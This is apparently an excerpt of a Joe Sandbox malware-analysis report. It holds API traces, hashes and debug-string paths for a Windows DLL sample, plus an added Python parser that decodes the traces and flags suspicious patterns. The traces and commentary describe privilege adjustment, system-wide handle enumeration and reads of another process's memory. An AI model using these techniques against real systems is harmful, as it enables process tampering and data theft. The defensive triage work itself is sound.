                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                  • String ID:
                                                                                  • API String ID: 351091851-3916222277
                                                                                  • Opcode ID: 41d3dcf17b7d2dbea94fde99f5d569808b75846182f44e7d2c0927f439d76e54
                                                                                  • Instruction ID: 34d3092894a315c34ee9dfa6f0fa29926d249eebd68fce94daef983892aee7a5
                                                                                  • Opcode Fuzzy Hash: 41d3dcf17b7d2dbea94fde99f5d569808b75846182f44e7d2c0927f439d76e54
                                                                                  • Instruction Fuzzy Hash: EF51EA79A002299FCB66EB58CC81BD9B7FCAF5D204F0051D5EA08AB211D630BF858F65
                                                                                  APIs
                                                                                    • Part of subcall function 6A6F0FA0: GetParent.USER32(?), ref: 6A6F0FF4
                                                                                    • Part of subcall function 6A6F0FA0: GetLastActivePopup.USER32(?), ref: 6A6F1005
                                                                                    • Part of subcall function 6A6F0FA0: IsWindowEnabled.USER32(?), ref: 6A6F1019
                                                                                    • Part of subcall function 6A6F0FA0: EnableWindow.USER32(?,00000000), ref: 6A6F102C
                                                                                  • EnableWindow.USER32(?,00000001), ref: 6A6F108D
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 6A6F10A1
                                                                                  • GetCurrentProcessId.KERNEL32(?,?), ref: 6A6F10AB
                                                                                  • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 6A6F10C3
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?), ref: 6A6F113D
                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 6A6F1182
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                  • String ID: 0
                                                                                  • API String ID: 1877664794-4108050209
                                                                                  • Opcode ID: 1ddabbaa034f593c3224723dee085de16ae54378ae0a5efddf034208794fb473
                                                                                  • Instruction ID: 090941163e5a6a626091b76d36fdcfb62d6339246b63dffdd62b658526b1cd59
                                                                                  • Opcode Fuzzy Hash: 1ddabbaa034f593c3224723dee085de16ae54378ae0a5efddf034208794fb473
                                                                                  • Instruction Fuzzy Hash: 7441D4B1A402589BDF21CF65CC46BD9B7BAAB06754F110994FA64E6280DF70DE818FA0
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • _memset.LIBCMT ref: 6A6DAAF0
                                                                                  • ReadProcessMemory.KERNEL32(00000000,00680000,?,00040000,?,?,00000000,0003FFFF,6A6DD58A,?), ref: 6A6DAB0D
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6DABC6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead_memset
                                                                                  • String ID: M$P$P$U
                                                                                  • API String ID: 3693474235-3046838568
                                                                                  • Opcode ID: 1008829cb124865e1c15520b0963fadfd1c4dd990daa23e023833a7d6d1b2cfd
                                                                                  • Instruction ID: aa269decd95e81c7646117ba08cf585dfebf398704cee08428f8a369ca429f44
                                                                                  • Opcode Fuzzy Hash: 1008829cb124865e1c15520b0963fadfd1c4dd990daa23e023833a7d6d1b2cfd
                                                                                  • Instruction Fuzzy Hash: 7B313F6200D3C19EC312DB784844A9FBFE45FB6258F480A9DF5E457292D664870DCBAB
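The record above is the one in this module worth reading closely. Inside subcall 6A6DD8E0 the code calls RtlAdjustPrivilege, opens processes, and calls ZwQuerySystemInformation with class 0x10 (SystemHandleInformation) twice around an allocate/free pair, which is the usual grow-the-buffer retry loop for enumerating every handle on the system; the caller then reads 0x40000 bytes out of another process with ReadProcessMemory and closes the handle. The Python below is an added example, not Joe Sandbox code and not code from the sample: it parses trace lines in exactly this report's format, cuts each call down to its documented parameter count (the plugin prints extra stack slots after the real arguments), names the well-known constants, and flags the pattern. The input is copied from the eleven API lines of this record plus one OutputDebugStringA line from a later record on this page. The constant values and parameter counts are documented Windows values, not taken from the report. Note that 000000FF in the process-handle slot and the shifted position of 001FFFFF in the first ZwOpenProcess call show the captured slots are not fully reliable, so the example reports the access mask as present on the stack rather than as the proven DesiredAccess.

```python
"""Triage helper for Joe Sandbox IDA-plugin API trace lines (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Documented Windows constants (values are not taken from the report).
SYSTEM_HANDLE_INFORMATION = 0x10   # SYSTEM_INFORMATION_CLASS 16
PROCESS_ALL_ACCESS = 0x001FFFFF    # Vista and later
MEM_COMMIT, MEM_RELEASE, PAGE_READWRITE = 0x1000, 0x8000, 0x04

# Documented parameter counts; the plugin prints extra stack slots after them.
_ARITY = {"RtlAdjustPrivilege": 4, "ZwOpenProcess": 4, "ZwAllocateVirtualMemory": 6,
          "ZwQuerySystemInformation": 4, "ZwFreeVirtualMemory": 4,
          "ReadProcessMemory": 5, "CloseHandle": 1, "OutputDebugStringA": 1}

# (api, 0-based argument index) -> {value: symbolic name}
_DECODE = {("ZwOpenProcess", 1): {PROCESS_ALL_ACCESS: "PROCESS_ALL_ACCESS"},
           ("ZwAllocateVirtualMemory", 4): {MEM_COMMIT: "MEM_COMMIT"},
           ("ZwAllocateVirtualMemory", 5): {PAGE_READWRITE: "PAGE_READWRITE"},
           ("ZwFreeVirtualMemory", 3): {MEM_RELEASE: "MEM_RELEASE"},
           ("ZwQuerySystemInformation", 0): {SYSTEM_HANDLE_INFORMATION: "SystemHandleInformation"}}

_LINE = re.compile(r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
                   r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
                   r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

@dataclass
class Call:
    api: str
    module: str
    args: List[Union[int, str, None]]   # int for hex slots, None for '?', str for literals
    ref: int                            # call-site address
    subcall_of: Optional[int] = None

def _parse_arg(tok: str):
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_trace(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(a) for a in raw.split(",")] if raw is not None else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16), sub))
    return calls

def describe(call: Call) -> str:
    """Render only the real parameters, with known constants named."""
    out = []
    for i, val in enumerate(call.args[: _ARITY.get(call.api, len(call.args))]):
        if val is None:
            out.append("?")
        elif isinstance(val, str):
            out.append(f'"{val}"')
        else:
            out.append(_DECODE.get((call.api, i), {}).get(val, f"0x{val:X}"))
    return f"{call.api}({', '.join(out)})"

def extract_strings(calls: List[Call]) -> List[str]:
    """Resolved string literals (paths, messages) are cheap IOCs."""
    return [a for c in calls for a in c.args if isinstance(a, str)]

def triage(calls: List[Call]) -> List[str]:
    findings = []
    qsi = [c for c in calls if c.api == "ZwQuerySystemInformation"
           and c.args[:1] == [SYSTEM_HANDLE_INFORMATION]]
    if len(qsi) >= 2 and any(c.api == "ZwFreeVirtualMemory" for c in calls):
        findings.append("handle enumeration: repeated SystemHandleInformation query with realloc")
    opens = [c for c in calls if c.api in ("ZwOpenProcess", "NtOpenProcess", "OpenProcess")]
    if opens and any(c.api == "ReadProcessMemory" for c in calls):
        findings.append("cross-process read: process opened, then ReadProcessMemory")
    if any(c.api == "RtlAdjustPrivilege" for c in calls):
        findings.append("RtlAdjustPrivilege before opening processes")
    # Captured slots are noisy (first ZwOpenProcess shows the mask two slots late): report presence only.
    if any(PROCESS_ALL_ACCESS in c.args for c in opens):
        findings.append("0x1FFFFF (PROCESS_ALL_ACCESS) on the stack at ZwOpenProcess")
    return findings

# Trace lines copied from the record above (its eleven API lines) plus one OutputDebugStringA line from this page.
SAMPLE = r"""• Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
• Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
• Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
• Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
• Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
• Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
• Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
• Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
• _memset.LIBCMT ref: 6A6DAAF0
• ReadProcessMemory.KERNEL32(00000000,00680000,?,00040000,?,?,00000000,0003FFFF,6A6DD58A,?), ref: 6A6DAB0D
• CloseHandle.KERNEL32(00000000), ref: 6A6DABC6
• OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dll), ref: 6A6D1ED2
"""
```

Feeding `SAMPLE` to `parse_trace` and `describe` turns the second allocation into `ZwAllocateVirtualMemory(0xFF, ?, 0x0, ?, MEM_COMMIT, PAGE_READWRITE)` and the query into `ZwQuerySystemInformation(SystemHandleInformation, 0x0, 0x1, ?)`, which is what a reviewer wants to see when deciding whether the function is a handle scanner or something benign. The same parser runs over the OutputDebugStringA records further down, where `extract_strings` pulls out the DLL paths the sample writes to its debug output; `triage` is a heuristic over API names and decoded constants and should be read as a pointer to which function to open in the disassembler, not as a verdict.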
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D1E87
                                                                                  • _strncpy.LIBCMT ref: 6A6D1EA4
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D1EB8
                                                                                  • OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dll), ref: 6A6D1ED2
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D1ED9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dll$C:\pl.txt
                                                                                  • API String ID: 3727115324-957995623
                                                                                  • Opcode ID: 500563caf83fa69010cc137430b01feacb1c788d7256e3dbdf0c9bb20ff08aac
                                                                                  • Instruction ID: 794ecca912fc8c597c94911f31c956c78491262c39d17e89a204a2ae4d34411b
                                                                                  • Opcode Fuzzy Hash: 500563caf83fa69010cc137430b01feacb1c788d7256e3dbdf0c9bb20ff08aac
                                                                                  • Instruction Fuzzy Hash: 4F014E7290411167E300EBA48D5CFA73BE54F82784F0A4511FA54D7251DEA1EB0CC3E1
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D1F17
                                                                                  • _strncpy.LIBCMT ref: 6A6D1F34
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D1F48
                                                                                  • OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dll), ref: 6A6D1F62
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D1F69
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dll$C:\pl.txt
                                                                                  • API String ID: 3727115324-3795257306
                                                                                  • Opcode ID: 7a5a6f662f98f2ff7731ecaa0c2be80a4acb4a0d7b5f97e52d84882a3ad49a00
                                                                                  • Instruction ID: 8a5cc36b764909ac7f4eb23419e4d3e5d978e17bce8c2bfd7a711c352e2ed9b3
                                                                                  • Opcode Fuzzy Hash: 7a5a6f662f98f2ff7731ecaa0c2be80a4acb4a0d7b5f97e52d84882a3ad49a00
                                                                                  • Instruction Fuzzy Hash: B9012072D0411167F301AB688D48F973BF55F826C4F094911F95497261DFB0EA0CC3E1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\Users\user\Desktop\CFA702\D2EDCA7E\CF3651B9$C:\pl.txt
                                                                                  • API String ID: 3727115324-3866704170
                                                                                  • Opcode ID: f70bff1d82c6dd82e17c18da3641c02fd42723a91ebeb6e221c4737e990921d3
                                                                                  • Instruction ID: 8cba4ae1ef712296ccd029ffc3f4bba14ec6b7cbdb5a0f7f36d5cedce6d1a77b
                                                                                  • Opcode Fuzzy Hash: f70bff1d82c6dd82e17c18da3641c02fd42723a91ebeb6e221c4737e990921d3
                                                                                  • Instruction Fuzzy Hash: AE019E7190411167F300DBA48E4CFAB3FE59F82780F0A4455FA40A7219EF60E90CC3D1
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D1DF7
                                                                                  • _strncpy.LIBCMT ref: 6A6D1E14
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D1E28
                                                                                  • OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dll), ref: 6A6D1E42
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D1E49
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dll$C:\pl.txt
                                                                                  • API String ID: 3727115324-3837916900
                                                                                  • Opcode ID: dda03b99b878fad6a4aacf03342c8c070ea27ea43d50e88826ecc3ccc7db0dce
                                                                                  • Instruction ID: 1614ec3f9c701ec46cd30a2e9514f22c7c2196b51a79e5598689a56ded7e2072
                                                                                  • Opcode Fuzzy Hash: dda03b99b878fad6a4aacf03342c8c070ea27ea43d50e88826ecc3ccc7db0dce
                                                                                  • Instruction Fuzzy Hash: 17012B7360822167F300D7A8CD48FAB7BE54FC1784F0A4510FA84A7251DEA0EA4DC3E1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_sprintf
